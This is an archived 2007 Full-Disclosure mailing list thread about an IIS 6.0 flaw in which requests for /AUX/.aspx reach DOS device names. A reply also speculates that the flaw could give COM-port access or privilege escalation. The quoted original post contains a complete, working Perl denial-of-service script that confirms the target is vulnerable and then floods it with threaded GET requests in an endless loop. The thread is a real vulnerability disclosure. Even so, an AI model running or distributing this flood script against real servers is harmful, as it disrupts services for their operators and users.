lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <231008201.20070523135356@SECURITY.NNOV.RU>
Date: Wed, 23 May 2007 13:53:56 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "kingcope" <kingcope@....net>
Cc: 'Full-Disclosure' <full-disclosure@...ts.grok.org.uk>,
	bugtraq@...urityfocus.com
Subject: Re: Question Regarding IIS 6.0 / Is this a DoS???

Dear kingcope,

Funny enough, there is a chance this vulnerability can also be exploited
as  a  local  unauthorized  access  or  privilege escalation, to execute
user-supplied  .aspx  script  from  COM  port (via serial cable) without
having   console   access   with   permissions   of   Web   application.
IWAM_%COMPUTERNAME%  is default, but it's often elevated for application
pools for different reasons.

Need to be tested though.

Same  vulnerability  existed  in IndigoPerl some time ago. See "One more
funny bug" in http://securityvulns.com/docs6145.html


--Wednesday, May 23, 2007, 12:54:35 PM, you wrote to 3APA3A@...URITY.NNOV.RU:

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -----Original Message-----
k> From: 3APA3A [mailto:3APA3A@...URITY.NNOV.RU] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; bugtraq@...urityfocus.com
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's  vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application
>>from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@...ts.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some
k> servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to a IIS 6.0 server
k> requesting
k>> #/AUX/.aspx the server gets instable and non responsive. This happens
k> only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope kingcope@....net
k>>
k> ##########################################################################
k>>
k> ###***********************************************************************
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this from a Linux system
k>>
k> ##########################################################################

k>> use IO::Socket;
k>> use threads;

k>> if ($ARGV[0] eq "") { exit; }
k>> my $host = $ARGV[0];

k>> $|=1;

k>> sub sendit {
k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                               PeerPort => 'http(80)',
k>>                               Proto    => 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";
k>> }

k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                               PeerPort => 'http(80)',
k>>                               Proto    => 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";

k>> $k=0;
k>> while (<$sock>) {
k>> 	if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>> 			$k=1;
k>> 			last;
k>> 	}
k>> }

k>> if ($k==0) {
k>> 	print "Server does not seem vulnerable to this attack.\n";
k>> 	exit;	
k>> }

k>> print "ATTACK!\n";

k>> while(1){

k>> for (my $i=0;$i<=100;$i++) {
k>> 	$thr = threads->new(\&sendit);
k>> 	print "\r\r\r$i/100                        ";
k>> }

k>> foreach $thr (threads->list) {
k>> 	$thr->join;
k>> }
k>> }


k>> _______________________________________________
k>> Full-Disclosure - We believe in it.
k>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k>> Hosted and sponsored by Secunia - http://secunia.com/




-- 
~/ZARAZA http://securityvulns.com/
Таким образом он умирает в шестой раз - и опять на новом месте. (Твен)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ